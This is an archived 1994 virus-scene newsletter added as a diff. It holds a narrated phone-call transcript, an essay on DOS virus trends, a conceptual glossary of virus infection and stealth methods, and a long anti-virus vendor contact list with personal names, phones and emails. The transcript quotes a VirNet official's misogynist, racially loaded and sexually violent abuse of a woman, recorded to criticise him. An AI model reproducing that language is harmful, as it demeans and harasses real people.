+ +[Cris Staff Member] + +"A persons life is a whole other story, for someone to fly out to +blow someone's brains out, that person would be short in the head +or something, so that is a whole different scenario" + +[Virnet Hierarchy] + +"Well she needs somebody to, [pause] she needs to sit in jail and +have some BIG BLACK WOMAN, [pause] STICK A BROOM HANDLE UP HER +CUNT!" [pause] "and hopefully the broom handle will have slivers, +maybe it will excite her! BIG FAT GREASY BITCH!" + + +[Narrator] + +This is all going to far at this point, the slander against someone +he hardly knows and his vulgar tongue is working overtime, now he +goes on to defend the issue of looking into peoples personal +background. (meaning credit and legal checks) + +[Virnet Hierarchy] + +"Does it matter if I said I was going to hire an investigator to do +checks on every person in virnet?" + +[Cris Staff Member] + +"well, you should not have told her though, you should have never +said anything to her" + +[Virnet Hierarchy] + +"it's right in the papers, that four people, BEFORE SHE JOINED, +THAT DIRTY UGLY SLUT SHOULD LEARN HOW TO READ! its right in the +papers that four people will have access to your information, the +REC, the applications coordinator, Mr. Michael Larson, and she put +up such a bitch about him having information on her, and if need +be, and INVESTIGATOR! [pause] IT SAY'S THAT IN THE PAPER WORK!" + +[Cris Staff Member] + +"hum" + +[Virnet Hierarchy] + +"what ever she does in life, if she gets stopped for a traffic +violation, the whores going to get stopped and checked for +everything that she's ever done!" + + +[Narrator] + +This goes on, and there is much more slander about named virus +writers, virus writers in general, groups, etc. But this is here +so you can understand why I feel that virnet has it's problems and +I want no part in it. + + + +Part #2 Virnet Background Checks +--------------------------------- + +Next lets touch the area of background checks. 
Did you know that +this [Virnet Hierarchy] believes that they (if they feel the need) +believe they can check you out in ANY WAY they want? + +This includes LEGAL, CREDIT, PERSONAL, ETC... this virnet hierarchy +told me that it has always been done this way. People did not know +it, but the previous hierarchies did this as well. THIS WAS TOLD ME +BY THIS VIRNET HIERARCHY! + +They feel that the words in the application that you fill out where +it says about your info on the application, that "if need be, and +investigator" will see it, means that they can find a private +investigator or friend of their's to look into your LEGAL and +PERSONAL background and DIG UP any info they can find on you! + +This hierarchy feels that there is no forgiveness or excuses for +mistakes, if you have a bad credit background it shows you are +"unstable" and not fit for the net! If you were an X-Convict and +paid your debt to society, you will do it again and could be a bad +egg in the net, so you should not be allowed in the net! + +[Narrator] + +So what we will see here is where the common fact of him telling me +that he had someone do these checks on this virnet node is not +disputed, but rather EVERY TIME I bring it up he changes the +subject until it comes to the point where after hours I confront +him and corner him on the issue and he spills the beans. + +[Cris Staff Member] + +"I guess the main thing she was talking about was the virnet checks, +you know that they checked into her credit" + +[Narrator] ---> Interrupted by Virnet Hierarchy and changes the +topic. + +[Virnet Hierarchy] + +"I will not divulge information on my life, whether I am getting +along with my wife or not, or whether my penis is shriveled up or +not.." + +[Narrator] + +So he goes on and on to keep away from the issue. + +[Cris staff Member] + +"Well you did do a check on her right? " + +[Virnet Hierarchy] + +"huh?" 
+ +[Cris Staff Member] + +"I remember you telling me about this" + +[Narrator] ----> Interrupted again and changes the topic. + +[Virnet Hierarchy] + +"Hold on a minute I am reading a letter" + +[Narrator] ----> after a few minutes of reading he never comes back +to answer. + +[Cris Staff Member] + +"well the biggest thing she has right know but she does not have any +proof of," + +[Virnet Hierarchy] + +"Uh hu" + +[Cris Staff Member] + +"is when you told here about the credit and legal check that was +done on her, She does not have any proof of it but" + +[Narrator] + +Cris Staff Member interrupted + +[Virnet Hierarchy] + +"I told her my dick was twelve inches long she didn't talk about +that!" + +[Cris Staff Member] + +"I don't think that would matter much" + +[Virnet Hierarchy] + +"why wouldn't that, ya she's so fat it wouldn't even phase her, 320 +lbs. this girl is, I'd have to have a dick that was like god damm +A baseball bat." + +[Narrator] + +So we see once again he changes the topic! + +[Cris staff Member] + +"Well the main thing she's got is the fact of the legal and +background checks, but she does not have any proof at all, there is +nothing in writing that she can pull up, just that one instance of +you informing her that it was done on her." + +[Narrator] + +Again this goes on, no comment on what was said, just A change of +topic. This goes on many times, at least 12 other times where he +evades the issue until he is cornered on it! + +[Virnet Hierarchy] + +"Does it matter if I said I was going to hire an investigator to do +checks on every person in virnet?" + +[Cris Staff Member] + +"well, you should not have told here though, you should have never +said anything to her" + +[Virnet Hierarchy] + +"it's right in the papers, that four people, BEFORE SHE JOINED, +THAT DIRTY UGLY SLUT SHOULD LEARN HOW TO READ! its right in the +papers that four people will have access to your information, the +REC, the applications coordinator, Mr. 
Michael Larson, and she put +up such a bitch about him having information on her, and if need be, +and INVESTIGATOR! [pause] IT SAY'S THAT IN THE PAPER WORK!" + +[Cris Staff Member] + +"hum" + +[Virnet Hierarchy] + +"what ever she does in life, if she gets stopped for a traffic +violation, the whores going to get stopped and checked for +everything that she's ever done! + +[Cris Staff Member] + +"I have to be honest with you here ... I see mail nets as a hobby, +I would not want a net to be looking into my legal and credit +information. I am sure you feel the same way!" + +[Virnet Hierarchy] + +"Your ABSOLUTELY wrong!" + +[Cris Staff Member] + +"Tell me why I am wrong" + +[Virnet Hierarchy] + +"Everything we do in life, everything we do we get checked! When you +go for a job, you get checked, you sign a paper, maybe you haven't +but I have signed many of papers that said [changes idea] No matter +what you do, if you drive, no matter what you do in life, driving +can be a hobby, but your going to get checked! " + +"Let me give you a beautiful example, she better not ever go to LA. +california, they send police officers on the street, and they just +stop people at will, and they run a check on them!" + +[Cris Staff Member] + +"But we are talking about a net here, ok you feel this way because +it's an anti-virus net or if it was any net?" + +[Virnet Hierarchy] + +"ANY NET! A N Y N E T!, when you join an organization they have +every right to check up on you because you are becoming part of a +team. and maybe there is someone that don't want as part of that +team." + +[Cris Staff Member] + +"Well I know there is allot of people that may have claimed a +bankruptcy in their past, or maybe they are an x-convict, they +spent time for a certain crime, but they paid their dept to +society. So if that shows up they are going to be kicked out of the +net? 
What virnet does it it's own business, I don't want to argue, +but" [interrupted] + +[Virnet Hierarchy] + +"She was offered to resign! did she resign? she makes it look like +she quit the virnet! in fact all hells going to break loose when I +resign, I'm going to resign. Everybody's going down!" + +[Narrator] + +This still goes on quite a bit, talking about many different topics +such as law, how you should not make mistakes and if you do you +should go to jail for them, how viruses should be against the law +and people that write them should be locked up, many virus writers +are mentioned and slandered, but then on the topic of prostitutes, +they are ok! and other law breakers are not as bad as virus +writers. I told him that I resign my node number for virnet, and +he asked me to please wait until this all blows over, but I could +not wait for this all to come out in the open, so I just left my +node number with him. + +Also I have a number of hole cards ready to come out on Mr. Virnet +Hierarchy in case the same kind of slander comes this way. + +Here is A post that also shows support in this issue: + +* Original Area:NETMAIL +* Original 
From: David Schepper (1:114/150) +* Original To : Pam Trexler (1:15/20) + + > I would be interested to know how this turns out for + > you and Steve. Virnet + > is a great disappointment to me all the way round. + +Well, I got a call from Mr. Nuemann (spelling?) last night, and we spent about +two hours on the phone, during which time he told me things about you (the +same things that you had already told me), and we got into a discussion about +having virus writers in the net. I told him that, yes, there should be SOME +screening, but that the net would be better served if they had at least SOME +opposing information allowed access, but he disagreed. I might have been +willing to stay in the net, had he not basically confirmed your statements +about background checks. He said that they DO hire Private Investigators to +look into the backgrounds of "questionable" people. At that point, I told him +that I believed that they had overstepped the bounds of ANY network, and that +what they are doing may indeed be illegal. I also told him that my privacy and +integrity were MUCH more important to me than ANY net, and could no longer +afford to be associated with their net. + +Anyway, to make a long story short, I am no longer associated with VirNet, and +their communistic approach to what is STILL basically a hobby. + + Dave + + +C.R.I.S (Computer Research & Information Service) + diff --git a/textfiles.com/virus/cnws2002.vir b/textfiles.com/virus/cnws2002.vir new file mode 100644 index 00000000..ac552807 --- /dev/null +++ b/textfiles.com/virus/cnws2002.vir 
@@ -0,0 +1,59 @@ +CrisNews #2 - 05/01/94 + +Reprinted With Permission +By: Cris Research Staff + + + The Virus Threat + (c) Ian Douglas 1993 + +Has the threat from viruses started to decline? The number of viruses for the +IBM PC (Intel x86) platform grows daily, but various events are making the IBM +environment safer. (Experts predict around 4000 - 6000 DOS viruses by the end +of 1994.) + +Chief amongst these is the move away from DOS to new operating systems. The +trend started with Windows (not really an operating system), and has +accelerated with the advent of a reliable OS/2. Further down the line, there +is Windows NT and UNIX. These environments are very unfriendly for the 3000+ +DOS-based viruses. There is a joke that Windows is a good virus detector - if +a Windows file gets infected by a DOS virus, it crashes :-) + +There are two known viruses that can infect Windows executables, but none at +present that can infect OS/2 executables. No known DOS viruses can run under +native OS/2, but only in a DOS session. Also, the constant upgrades to DOS +itself prevent some viruses from working altogether. + +There are three main areas of virus spread: Large businesses, educational +institutions, and swopping disks among friends. Many large business are moving +to OS/2, others will move to Windows NT. In both cases, they are cutting out +an important vector of virus spread. I foresee that educational institutions +will also move to these new operating systems in the near future. The market +will demand students trained in them. This will once again cut out a major +vector for virus spreading. + +That leaves the average user, still running DOS. His has less chance of +getting a virus, since the two main vectors are being cut out. The most common +viruses are boot sector infectors, like Stoned. While these may be able to +infect a machine running OS/2, they will not spread from such a machine. + +The other interesting development has been in the underground. 
In the race to +create the super-duper type viruses, they have been trying to write complex +viruses. These take longer to write and are usually more buggy. Thus they make +fewer viruses. In order to brag, they publish the viruses in electronic +magazines, and make them available for download on virus exchange BBS's. This +means that they end up in the hands of anti-virus authors, before they have +had a chance to spread widely. Thus the AV authors soon include detection, and +the virus does not spread very much. + +Many virus exchange BBS's have mostly junk (virus wannabe's) available. Since +the person downloading it only finds out afterwards, the spread of viruses +from these BBS's is not as bad as it might have been. + +There also seems to be a growing maturity amongst some members of the +underground, leading to fewer virus writers and viruses. Hopefully, they will +ALL grow up soon. + + +Cheers, Ian + diff --git a/textfiles.com/virus/cnws2003.vir b/textfiles.com/virus/cnws2003.vir new file mode 100644 index 00000000..f24d86e3 --- /dev/null +++ b/textfiles.com/virus/cnws2003.vir 
@@ -0,0 +1,103 @@ +CrisNews #2 - 05/01/94 + +By: Childe Roland - Cris South Africa + +This is an attempt to explain some of the terminology used in +connection with viruses. + + + File infecting viruses. + + These viruses spread by adding code to executable files and thus + have the potential to become active when an infected program is + executed. Therefore they must make some change in the target file. + If normal DOS calls are used to write to it the file-creation + date will be changed. When code is added to it the file size will + change. Should areas of the file be overwritten the length may re- + main unchanged but CRC or checksum checking can detect the change + in the file. + This brings us to: + + 1.Overwriting viruses.The simplest of these just overwrite a part + of the target file and puts a jump at the beginning of the pro- + gram pointing to the viral code. This tends to limit their success + as loss of the overwritten code may be fatal to the program. To + increase their chance of success, some, like the Zerohunt virus, + look for a string of nul characters of sufficient length to acco- + modate it. Some append the overwritten part of the file to the + end like the Nina virus which overwrites the beginning of the file + and the Phoenix which overwrites a random section of the target, + and then append the overwritten part to the end. + Both the 512 and 1963 overwrite the beginning of a file and moves + the overwritten code into a portion of the last cluster occupied + by the file where there is often space which is invisible to the + operating system. + + 2.Prepending viruses.These viruses add their code to the beginning + of the target program. This ensures that the virus is executed + everytime the program is, also that this happens before the pro- + gram runs and it therefore has priority in terms of operation and + possible conflicts. 
It is also necessary to alter the FAT at + least to ensure that the program call starts with the viral code + and that the viral code is not overwritten by other changes to + tha disk or files. The original code is left unchanged but the + is altered and unless techniques are used to disguise this it + will show a different creation date and size. The Rat virus in- + serts itself in unused space in EXE file headers. The Suriv 2.01 + moves the body of the file and inserts itself between the header + and original file and then changes the relocation information + in the header. + + 3.Appending viruses. These viruses add their code to the end of + the target. They must change the file header code to ensure that + the file execution starts towards the end and not at the normal + position. At the end of the viral code there is a jump pointing + to the start of the target program. Here too the file size and + date will change. + + 4.Companion viruses. Also known as spawning or precedence viruses. + In files with similar names there is an order of precedence in + their execution under DOS. First on the list is .com files, then + .exe and then .bat files, i.e. virus.com is executed before + virus.exe and last is virus.bat file.These viruses create a file + with a similar name but a .com extension, thus the .com is al- + ways executed in place of the original .exe file. The original + stays exactly the same and no change detection programs will pick + up the virus. The virus usually ends with a specific call to the + original program while it has the hidden attribute set for it- + self. + + Stealth viruses. + + A virus usually contains some identifiable string or code that + can be used to identify it, even when it is new or polymorphic. + Stealth thus refers to the various mechanisms virus programs use + to hide themselves. The earliest attempts at hiding were pre- + venting the file size from changing and resetting the file crea- + tion date to the original. 
+ + Then there is the DIR II virus. The viral code is written to one + section of the disk and then it alters the directory and file + allocation information in such a way that all programs seem to + start at that one section of the disk where the viral code is + situated. + + Nowadays stealth refers more to the trapping mechanisms viruses + use to prevent detection. These tricks are only effective once + the virus is memory resident ( or active in memory.) The virus + can do this because few programs read or write directly to the + disk and leave the manipulation of the disk to the underlying + software and hardware. The operating system provides standard + interrupts which are system calls to the required functions. + When a program reads from or writes to a disk it does this by + calling standard interrupts or functions from a standard known + address. Code can be inserted at the standard address which + redirects the call to the code provided by the virus and it + filters the data returned to the calling program. When an in- + fected program is read the infection does not appear in the + data that the calling program receives and no trace of the + virus program can be found on disk. + + -------------------------------------------------------------- + childe roland. + diff --git a/textfiles.com/virus/cnws2004.vir b/textfiles.com/virus/cnws2004.vir new file mode 100644 index 00000000..c18e58ec --- /dev/null +++ b/textfiles.com/virus/cnws2004.vir 
@@ -0,0 +1,1955 @@ +CrisNews #2 - 05/01/94 + +---------------------------------------------------------------------------- +Have you ever thought you would like to call or write some of the AV +People you hear so much about? + +Well here you are a AV list with all of the info you will need! We give our +thanks to Robert for posting this info public for us all to gaze at :) + +---------------------------------------------------------------------------- + + Robert Slade Anti-Virus Contact List + + Re-Printed from A Message Capture + +From m2xenix!decus.arc.ab.ca!roberts +From: roberts@decus.arc.ab.ca ("Rob Slade, Ed. DECrypt & ComNet, VARUG rep, +604-984-4067") +To: INTNET::EAN%"mikko.hypponen@wavu.elma.fi" <@review@TITAN.arc.ab.ca> +Date: 8 Nov 93 14:31 -0600 + +Abacus +5370 52nd St., SE +Grand Rapids, MI 49512 +USA +800-451-4319 +616-698-0330 +fax: 616-698-0325 +Computer Viruses: a high tech disease, Ralf Burger, 1988, 1-55755-043-3 (no +longer available) +Virus Secure for Windows (no longer available) +Computer Viruses and Data Protection, Ralf Burger, 1-55755-123-5 + +ACM Press +11 W. 42nd St., 3rd Floor +New York, NY 10036 +212-869-7440 +Computers Under Attack: intruders, worms and viruses, Peter J. Denning, ed., +0-201-53067-8 +pjd@cs.gwu.edu + +A.C.C Inc. +West Orange, New Jersey, 07052 +USA +Contact Wendy Schwartz +1-201-325-7985 or 1-201-736-7109 +fax# 1-516-378-6124 +V-Phage hard disk write protect + +Sandy Jenish, Dave Reid (VP Marketing) +Advanced Gravis Computer Technology +7033 Antrim Avenue +Burnaby, B. C. +V5J 4M5 +604-434-7274 +Telecopier: (604) 434-7809 +Advanced Security for PC and Mac (product withdrawn) + +Aladdin Knowledge Systems +India +Marketed by Doon Instrument Processors +"Hasp" security card + +Henrik Alt +Kirgelweg 25 +7160 Gaildorf +Germany +Tel. 07971/7996 +Kto. 6428662, bei KSK Schbisch Hall, Blz 622 500 30 +Sagrotan (Atari) + +American Eagle Publications +P. O. 
Box 41401 +Tucson, Arizona 85717 +USA +602-888-4959, -4957 +The little black book of computer viruses, Mark Ludwig + +Antivirus Methods Congress (defunct?) +Dick Lefkon +New York University +dklefkon@well.sf.ca.us + +Borland/Ashton-Tate +20101 Hamilton Ave. +Torrance, CA 90509-9972 +USA +213-329-9989 +BBS: 213-324-2188 (920908 area changed to 310, number referred to 408-431-2275) +or +Department CR-10 +52 Oakland Avenue +East Hartford CT 06108 +Control Room system management package with antiviral utility + +ASP Press +PO Box 81270 +Pittsburgh, PA 15217 +USA +412-422-4134 +or +PO Box 1480 +Hudson, OH 44236 +cohen@fitmail.fit.qut.edu.au (Mr Fred Cohen) +"Computer Viruses", Fred Cohen, IT antiviral? + +Autrec Inc. +4305 - 40 Enterprise Drive, Suite A +Winston-Salem, NC 27106 +USA +(919) 759-9493 +PC-SAFE II half card security board + +B.R.M. +Israel +V-Analyst checksumming program + +Bangkok Security Associates +888/32-33 Ploenchit Road +Bangkok 10330 +Thailand +TEL: 662-251-2574 +BBS: 662-255-5981 +FAX: 662-253-6868 +Alan_Dawson@mindlink.bc.ca +or Delta Base Enterprises +221 - 32853 Landeau Place +Abbotsford, BC, V2S 6S6 +TEL: 853-2998 +FAX: 853-9164 effective NOV18/92 +72137.603@compuserve.com or a682@mindlink.bc.ca +or Computer Security Associates +(803)-796-1935 +Lannatec Associates Inc, +166 Anna Avenue, +Ottawa, Ont. +K1Z 7V2 +(613)-724-5978. +Victor Charlie 5.0 - change detection + +Bantam Books/Doubleday/Dell +666 Fifth Ave. +New York, NY 10103 +USA +V.I.R.U.S. 
Protection, Pamela Kane, 0-553-34799-3 + +Christopher Mateja +Bits-N-Bytes Computer Services +333 15th St +Brooklyn, NY 11215 ( USA ) +BITNET: +INTERNET: +COMPUSERVE: 75230,476 +virus database (product not yet available) + +Black Box Canada Corporation +1111 Flint Road, Unit 13 +North York, Ontario +M3J 3C7 +800-268-9262 +416-736-8011 +Fax: 800-268-4221 +PC Security Board + +NCC Blackwell +1001 Fries Mill Road +Blackwood, NJ 08012 +609-629-0700 +800-257-7341 +Viruses, bugs and Star Wars, Geoff Simons, 1989, 0-85012-777-7 + +Brightwork Development Inc. +766 Shrewsbury Ave. +Jerral Center West +Tinton Falls, NJ 07724 +USA +908-530-0440 +201-530-0440 +800-552-9876 (US only) +fax: 201-530-0622 +Sitelock, Novell add-on operation restricting software $495 + +British Computer Virus Research Centre +12 Guildford Street, Brighton, East Sussex, BN1 3LS, England +Tel: 0273-26105 +Joe Hirst +Virus Simulation Suite, Eliminator/Virus Monitor/Virus Clean +see also ICVI, Thecia Systems + +Laboratory of Computer Virology +Bulgarian Academy of Science +Address: Bulgaria, + Sofia 1113 +acad. G. Bontchev str. bl.8 rm. 104 +tel: +359-2-719212 +bbs: +359-2-737484 (9600bps) +Assen Sharlandjiev +EUnet: assen@virbus.bg +FidoNet: 2:359/110@fidonet.org + +Business One Irwin +Homewood, IL 60430 +(Publisher One +Baltimore, Maryland?) +Chris Fuedo - xi685c@gwuvm.gwu.edu +Chris Feudo ("No such user" at gwuvm.gwu.edu) +The Computer Virus Desk Reference, 1992 + +Canadian Information Processing Society (CIPS) +Alana Foster, Newsletter Editor +c/o Central Guaranty Trust +1770 Market St., 6th Floor +Halifax, Nova Scotia +B3J 1N2 +fax: (902) 422-9290 +(no known specialty, included for info only) + +Canadian System Security Centre +Communication Security Establishment +(613) 991-7331 +Fax: (613) 991-7323 +Aaron Cohen acohen@cse.dnd.ca +ftp site manitou.cse.dnd.ca + +Carmel Software Engineering +EPG International +Hans-Stiessberger-Strasse 3 +D-8013 Haar by Muenchen +head office Israel? 
+Turbo Anti-Virus Set, scanner vaccine and change checker (including boot) + +CARO = Computer Antivirus Research Organisation +Christoph Fischer +Micro-BIT Virus Center +University of Karlsruhe +Zirkel 2 +W-7500 KARLSRUHE 1 +Germany ++49 721 376422 Phone ++49 721 32550 FAX +email: ry15@rz.uni-karlsruhe.de or vquery@rz.Uni-Karlsruhe.de + +CE Software +1854 Fuller Road +PO Box 65580 +West Des Moines, IA 50265 +Don Brown +Vaccine (Mac) + +Central Point Software +15220 N. W. Greenbrier Parkway #200 +Beaverton, OR 97006 +USA +503-690-8090 +503-690-8088 +800-445-4064 +800-445-4208 +Central Point Anti-Virus + +Century Hutchinson Ltd +(Century Communications 708-647-1200?) +(Century International 508-478-2000, 800-252-4752?) +(Century One 719-471-1322?) +(Century Publishing House 219-294-3789?) +New Hacker's Handbook, Steve Gold, 1989, 0-7126-3454-1 + +Certus International (see also Symantec/Norton) +13110 Shaker Square +Cleveland, Ohio 44120 +(Brecksville, OH?) +USA +216-546-1500 +216-752-8181 +216-752-8183 Technical Support +BBS 216-752-8134 +fax 216-752-8188 +800-722-8737 +800-729-6684 +Mike Mytnick, Cleveland +Michael Blumenfeld (404)434-1858 +Peter Tippett, 4295370 on MCI mail +operation restricting software, particularly for LANs + +Cheyenne Software +55 Bryant Avenue +Roslyn, NY 11576 +USA +800-243-9462 +516-484-5110 +InocuLAN + +COAST Project +Software Engineering Research Center & Dept. of Computer Sciences +Purdue University +W. Lafayette IN 47907-1398 +Gene Kim genek@mentor.cc.purdue.edu author +spaf@cs.purdue.EDU (Gene Spafford) phone: (317) 494-7825 +ftp.cs.purdue.edu pub/spaf/COAST/Tripwire +Tripwire integrity-monitor for Unix + +Command Software Systems +Jupiter, FL +407-575-3200 +800-423-9147 +75300.3645@CompuServe.COM +Lance McKay +or +93 Dewson St., Suite 101 +Toronto, Ontario +416-588-8341 +fax: 416-537-0998 +BBS: 416-532-0456 +F-PROT Professional (cf Frisk) + +Commcrypt Inc. 
+10000 Virginia Manor Road, Suite 300 +Beltsville, MD 20705-2500 +301-470-2500 +301-470-2503 +800-334-8338 +Fax: 301-470-2507 +BBS: 301-470-2510 +Detect Plus + +ComNETco, Inc. +29 Olcott Square +Bernardsville, NJ 07924 +USA +201-543-4060 +ViruSafe-Anti-Viral Software (cf EliaShim) +mail undeliverable + +Computer Consulting Group, Inc. +Old Highway 99 South +Ashland, OR 97520 +503-488-3237 +800-488-3236 +VirusClean + +Computer Emergency Response Team +Software Engineering Institute +Carnegie Mellon University +(412) 268-7090 (CERT 24 hour hotline) + +Computer Integrity Corporation +PO Box 17721 +Boulder, CO 80308 +Vaccinate + +Computer Security Connection (CSC) +National Security Associates, Inc. (NSAi) +mbrsvcs @ incomsec.org +FAX 703-758-8338 +$30.00 registration fee and $12.50 per hour of access time. + +Computer Virus Research Lab Wiesbaden +Howard Fuhs Elektronik +Rheingaustr. 152 +6200 Wiesbaden-Biebrich +Tel.:+49 611 67713 +Fax:+49 611 603789 +FIDO: 2:244/2120.7 +100120.503@CompuServe.com + +Computer Technologies NZ +PO Box 3598 +Wellinton, New Zealand +Jeremy Buckley jerry@tornado.gen.nz +jerry%tornado.gen.nz@mailhost.comp.vuw.ac.nz +Simon McAuliffe sai@tornado.gen.nz +NOVASAFE + +COMRAC +Postbus 710 +2130 AS Hoofddorp +The Netherlands +Victor Smith +G. Beekmans, Director +31 2503 21388 +BBS 31-3200-48835, Virus Rescue, Node: 2:282/401, 9:310/2 +or 31-3200-48831, Paradise Island +Gobbler II scanner + + +3250 South Western Avenue +Chicago, IL 60608 +312-782-9181 +Beaverbooks Ltd. +195 Allstate parkway +Markham, Ontario L3R 4T8 +Virus!: the secret world of computer invaders that breed and destroy, Allen +Lundell, 1989 + +Cordant Inc. +11400 Commerce Park Drive +Reston, VA 22091-1506 +USA +(703)758-7303 +Bryan Dorsey +Assure HW/SW antiviral + +COSMI, Inc. +431 N. 
Figueroa Street +Wilmington, CA 90744 +310-835-9687 +Virus Terminator + +Miller Freeman/CSI +600 Harrison Street +San Francisco, CA 94107 +415-397-1881 +415-905-2470 +Computer Security Handbook +CSI Black Book +The PC virus control handbook, Jacobson, 1990 + +CSE +Computer Security Engineers LTD +St. James House +New St. James Place +St. Helier +Jersey JE4 8WH +Channel Islands +Tel.: +44 534 500 400 +Fax : +44 534 500 450 +Research and Development +P.O.Box 85502 +2508CE Den Haag +Netherlands +Tel.: +31 70 36 52 269 +Fax : +31 70 36 52 286 +Niels-Jorgen Bjergstrom Commercial Director +Righard Zwienenberg programmer +Support BBS: +31 70 38 98 822 +(see also Computer Virus Research Lab Wiesbaden) +PC Vaccine Professional + +CSM Management and Consulting +3031 Main St. +Vancouver, B. C. +V5T 3G8 +604-879-4162 +Telecopier: 604-874-1668 +Overlord +product not available + +Cybec +PO Box 205 +Suite 3, 350 Hampton Street +Hampton, Victoria 3188 +Australia +Tel. +61 3 521 0655 +Fax. +61 3 521 0727 +Nichols Engleman s907997@godzilla.cgl.rmit.oz.au or @numbat.cs.rmit.oz.au +Roger Riordan riordan.cybec@tmx.mhs.oz.au, riordan@mhs.oz.au, +riordan@tmxmelb.mhs.oz.au +VET antiviral + +CyberSoft +210 West 12th Avenue +Conshohocken, PA 19428-1464 +(215) 825-4748 FAX (215) 825-6785 +research@cyber.com +VFIND UNIX antiviral + +CyberStore +Data : 604-526-3676 +Phone: 604-526-3373 +Fax : 604-526-0607 +commercial BBS system, archive of Slade reviews, columns and virus history +archives, also V.I.R.U.S. Doctor BBS feed + +Cylink +110 S. 
Wolfe Road +Sunnyvale, CA 94086 +USA +408-735-5800 +telecopier: 408-738-8269 +SecurePC - half card DES encryptor + +Data Fellows Ltd +Wavulinintie 10 +SF-00210 Helsinki, FINLAND +tel +358-0-692 3622 ++358-49-648-180 (mobile) +fax +358-0-670 156 +Ari Hypponen, hyde@ngs.fi +Mikko.Hypponen@compart.fi Mikko.Hypponen@wavu.elma.fi +f-prot@df.elma.fi +Data security consulting (Unix, MS-DOS, Macintosh, LANs) +Anti-virus consulting +F-PROT SF -- The Scandinavian version of the F-PROT anti-viral + package, supporting Finnish, Swedish, and English + +Datamedia Corporation +20 Trafalger Square +Nashua, NH 03063 +603-886-1570 +fax: 603-886-1782 +One Woodlands Court +Ash Ridge Road +Almondsbury, Bristol BS12 4LB +454 201515 +FAX: 454 616367 +SECUREcard for PC + +Datawatch Corporation +Triangle Software Division +P. O. Box 51489 +Durham, NC 27717 +(formerly Microcom Software Division +3700-B Lyckan Parkway +Durham, NC 27717 +USA +also Norwood, MA) +919-490-1277 +800-822-8224 +BBS: (919) 419-1602 +Virex-PC, also Virex for Mac - scanner +Mary Golden-Hughes +Glenn Jordan - beta list Fidonet: 1:155/223 +Jordan C. Glenn -- Microcom +cynic!van-bc!rock.concert.net!trent +see also Software Concepts Design + +George Davidsohn and Son Inc./The Davidsohn Group +20 Exchange Place, 27th Floor +New York, NY 10005 +USA +212-422-4100 +Telecopier 212-422-1953 +800-999-6031 +tech support 212-363-3201 +PR - Howard J. Rubenstein Assoc. Inc. +212-489-6900 - Laurie N. Terry +warren@worlds.com +Vaccine Version 5.00 - Anti-Viral Software. + +DECUS Canada +505 University Avenue, 15th Floor +Toronto, Ontario +M5G 1X4 +416-597-3437 +Fax: 416-971-5295 +Anne Murakami, Office Manager, annem@decus.ca +Robert Blain, SecSIG Chair +Robert Slade, SecSIG DECrypt editor, roberts@decus.ca +SecSIG DECrypt newsletter with strong virus component + +Deloitte & Touche +Computer Viruses, Deloitte Haskins & Sells, 1989 + +Digital Development Corporation +"virus checking" add-in board + +Digital Dispatch, Inc. 
+55 Lakeland Shores Road +Lakeland, Minn 55043-9601 +612-436-1000 +800-221-8091 +Antigen, Data Physician, Novirus-Anti-viral software + +Digital Enterprises +Gaithersburg, MD +V-Card + +Director Technologies Inc. +906 University Place +Evanston, IL 60201 +USA +Disk Defender-Half-Slot Virus Write-Interrupt Device + +Diversified Computer Products and Services +617-592-9001 +fax: 617-776-1515 +PC Doctor + +DogSoft +Dmitry O. Gryaznov +E-mail: grdo@grdo.botik.yaroslavl.su +Program Systems Institute +Russian Academy of Sciences +P/O Box 16, Pereslavl-Zaless +Yaroslavskaya, 152140 Russia +Phones: +7-085-359-8122 +BBS: +7-085-359-8301 +PC Shield - scanner/repair plus other components + +EICAR = European Institute of Computer Antivirus Research +Dr Paul Langemeyer +c/o Siemens Nixdorf AG +Otto-Hahn-Ring 6 +D-8000 Muenchen 83 +Germany +Tel: (+49) 089 636 82 660 +Fax: (+49) 089 636 82 824 + +EliaShim Microcomputers +520 W. Hwy. 436, #1180-30 +Altamonte Springs, Florida +USA +407-682-1587 +fax: 407-869-1409 +VirusSafe - TSR scanner cf Xtree (cf ComNETco?) + +Elsevier +Mayfield House +256 Banbury Road +Oxford OX2 7DH +England +655 Avenue of the Americas +New York, NY 10010 +USA +212-989-5800 +fax: 212-633-3990 +Computer Virus Handbook, Harold Joseph Highland, 1990, 0-946395-46-2 +highland@dockmaster.ncsc.edu + +Bob Bosen +Enigma Logic Inc. +2151 Salvio Street, #301 +Concord, CA 94565 USA (94520?) +Tel: (415) 827-5707 + (800) 333-4416 (not from Canada) +FAX: (415) 827-2593 +Internet: 71435.1777@COMPUSERVE.COM +Safeword - change detection software + +Paul Ferguson +Sentry Net BBS (1:109/229) +Centreville, VA +USA +BBS: 703-815-3244 +Fidonet VIRUS_INFO Moderator, editor Legal Net Monthly + +Fifth Generation Systems, Inc. +P.O. Box 83560 +Baton Rouge, Louisiana +USA 70884-3560 +10049 N. Reiger Rd. +Baton Rouge, Louisiana +USA 70809-4559 +800-677-1848 +800-365-3186 +1-800-873-4384 sales and info (number invalid?) 
+504-291-7283 tech support +800-766-7283 tech support +(David Kirby 75300.3661@compuserve.com) +telecopier: 504-292-4465 +Business Phone: (504) 291-7221 +FAX: (504) 295-3268 +Clivedon Office Village +Lancaster Road, High Wycomb +Bucks, HP12 3YZ, England +Business Phone: +44-(0)-494-442224 +FAX: +44-(0)-494-442225 +Sales/Support: +44-(0)-494-442223 +3715 Sun Hung Kai Centre +30 Harbour Rd. +Waichai, Hong Kong +Business Phone: (852) 827 6977 +Fax: (852) 824 3200 +markets Mace Vaccine-Anti-viral software, Disklock hard disk security +also Untouchable, a renaming of V-Analyst by B.R.M. Technologies, Israel +Search and Destroy + +Fink Enterprises +11 Glen Cameron Road, Unit 11 +Thornhill, Ontario +L3T 4N3 +416-764-5648 +Telecopier: 416-764-5649 +IRIS Antivirus (from Israel, cf Techmar) + +Fischer International Systems Corporation +P. O. Box 9107 +4073 Merchantile Avenue +Naples, Florida 33942 +813-643-1500 +800-237-4510 +Watchdog + +Foley Hi-Tech Systems +172 Amber Drive +San Francisco, CA 94131 +(415) 826-6084 +(415) 826-1707 BBS +(415) 826-1706 FAX +Safety Disk + +FoundationWare +2135 Renrock Rd. +Cleveland, OH 44118 +USA +Vaccine 1.2-Anti-viral software +mail undeliverable, now Certus + +Fresh Technology +1478 North Tech Blvd., Suite 101 +Gilbert, Arizona 85234 +USA +800-79FRESH (793-7374) (not working) +Fax: 602-497-4200 +AntiVirus Assist (repackaging of McAfee NETSCAN and CLEAN) + +Fridrik Skulason +Frisk Software International +Postholf 7180 +IS-127 Reykjavik +Iceland +Phone number +354-1-617273 +Fax number +354-1-617274 +frisk@complex.is +F-PROT 2.xx Virus 